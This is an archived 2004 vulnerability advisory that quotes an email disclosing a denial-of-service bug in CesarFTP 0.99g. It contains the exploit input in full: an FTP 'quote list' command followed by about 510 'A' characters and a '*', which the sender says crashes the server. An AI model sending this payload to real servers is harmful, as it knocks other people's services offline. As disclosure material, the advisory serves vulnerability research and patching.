New CesarFTP v 0.99g DoS

2004-01-14T00:00:00
ID SECURITYVULNS:DOC:5633
Type securityvulns
Reporter Securityvulns
Modified 2004-01-14T00:00:00

Description

just thought that, since you seemed interseted in the topic earlier, I would e-mail you this exploit. I don't think that it's going to get patched anytime soon anyways, so it doesn't matter. I haven't tested remotely (network trouble) but I would like to get some info back on your results. I can only ask, but please do not post this until you give me some feedback. Simple dos situation.

ftp> quote list ftp> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA*

while the other exploit needs 10000 A's, this needs only 510, followed by a "*". You'll know why it needs to be tested remotely when you exploit it. Somewhat interesting.

sincerely,

what


Do you Yahoo!? Yahoo! Hotjobs: Enter the "Signing Bonus" Sweepstakes